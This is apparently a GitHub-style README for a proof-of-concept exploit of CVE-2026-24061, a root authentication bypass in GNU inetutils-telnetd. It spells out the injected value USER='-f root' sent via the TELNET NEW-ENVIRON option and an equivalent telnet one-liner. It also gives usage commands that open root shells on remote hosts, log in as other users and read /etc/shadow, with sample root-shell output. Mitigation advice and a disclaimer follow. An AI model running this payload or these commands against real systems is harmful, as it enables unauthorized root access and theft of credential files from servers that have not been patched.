Share
## https://sploitus.com/exploit?id=FCE7EA44-906D-5961-8031-B456EC8AEBFB
# CVE-2026-24061 โ€” inetutils-telnetd Authentication Bypass

A proof-of-concept exploit for the authentication bypass vulnerability in GNU inetutils-telnetd.

## Overview

**CVE-2026-24061** is a critical authentication bypass vulnerability affecting `inetutils-telnetd` versions **1.9.3 through 2.7**. It allows a remote attacker to obtain a root shell on vulnerable systems without providing any credentials.

## Vulnerability Details

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-24061 |
| **Affected Software** | GNU inetutils-telnetd |
| **Affected Versions** | 1.9.3 โ€“ 2.7 |
| **Vulnerability Type** | Authentication Bypass |
| **CVSS Score** | Critical |
| **Attack Vector** | Network |

### How It Works

The vulnerability exploits a flaw in how `telnetd` handles the `USER` environment variable received via the TELNET NEW-ENVIRON option (RFC 1572) during protocol negotiation.

1. **TELNET Protocol Negotiation**: When a client connects, the server and client negotiate capabilities including the NEW-ENVIRON option, which allows the client to send environment variables.

2. **Malicious USER Value**: The exploit sends `USER=-f root` as an environment variable during this negotiation phase.

3. **Unsafe Argument Passing**: The vulnerable `telnetd` passes this value unsanitized to the `login` program.

4. **Command Injection**: The `login` program interprets `-f root` as command-line flags:
   - `-f` = "force login without authentication"
   - `root` = the username to log in as

5. **Root Access**: The attacker gains a root shell without ever being prompted for a password.

### The Core Issue

```
Client sends:  USER = "-f root"
telnetd runs:  login -f root
Result:        Root shell granted without authentication
```

This is equivalent to running `USER='-f root' telnet -a localhost` on a system with a vulnerable telnetd.

## Requirements

- Python 3.6+
- No external dependencies (uses only standard library)

## Installation

```bash
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py
```

## Usage

```bash
./exploit.py [OPTIONS] 
```

### Options

| Option | Description | Default |
|--------|-------------|---------|
| `host` | Target hostname or IP address | Required |
| `-p`, `--port` | Target port | 23 |
| `-u`, `--user` | USER value to inject | `-f root` |
| `-c`, `--command` | Run a single command (non-interactive) | None |
| `-t`, `--timeout` | Connection timeout in seconds | 10 |

### Examples

**Interactive root shell on localhost:**
```bash
./exploit.py localhost
```

**Interactive root shell on remote host:**
```bash
./exploit.py 192.168.1.100
```

**Execute a single command and exit:**
```bash
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local
```

**Login as a different user:**
```bash
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server
```

**Non-standard port:**
```bash
./exploit.py -p 2323 localhost
```

**Combine options:**
```bash
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100
```

## Interactive Mode

When run without the `-c` flag, the exploit drops you into an interactive shell:

- Full TTY support with proper terminal handling
- Press **Ctrl+]** to escape and close the connection
- Press **Ctrl+C** to interrupt

## Output Example

```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    โ•‘
โ•‘  Affects: inetutils-telnetd 1.9.3 - 2.7                      โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 
```

## Mitigation

### Immediate Actions

1. **Disable telnetd**: If not strictly required, disable the telnet service entirely
   ```bash
   sudo systemctl stop inetutils-telnetd
   sudo systemctl disable inetutils-telnetd
   ```

2. **Use SSH instead**: Replace telnet with SSH for remote access
   ```bash
   sudo apt install openssh-server
   ```

3. **Firewall rules**: Block port 23 from untrusted networks
   ```bash
   sudo ufw deny 23/tcp
   ```

### Long-term Fix

- Update to a patched version of inetutils when available
- Monitor vendor advisories for security patches

## Technical Details

The exploit implements a minimal TELNET client that:

1. Establishes a TCP connection to the target
2. Responds to TELNET option negotiations (DO/DONT/WILL/WONT)
3. When the server requests environment variables via NEW-ENVIRON:
   - Sends `USER=-f root` in the ENV_IS response
4. Handles terminal type (TTYPE) and window size (NAWS) negotiations
5. Provides interactive or command-execution modes

### Relevant RFCs

- [RFC 854](https://tools.ietf.org/html/rfc854) โ€” TELNET Protocol Specification
- [RFC 1572](https://tools.ietf.org/html/rfc1572) โ€” TELNET Environment Option

## Disclaimer

This tool is provided for **educational and authorized security testing purposes only**.

- Only use this exploit on systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The authors are not responsible for any misuse or damage caused by this tool

## License

MIT License โ€” See [LICENSE](LICENSE) for details.

## References

- [CVE-2026-24061 Details](https://vulners.com/cve/CVE-2026-24061)
- [GNU inetutils](https://www.gnu.org/software/inetutils/)
- [TELNET Protocol RFC 854](https://tools.ietf.org/html/rfc854)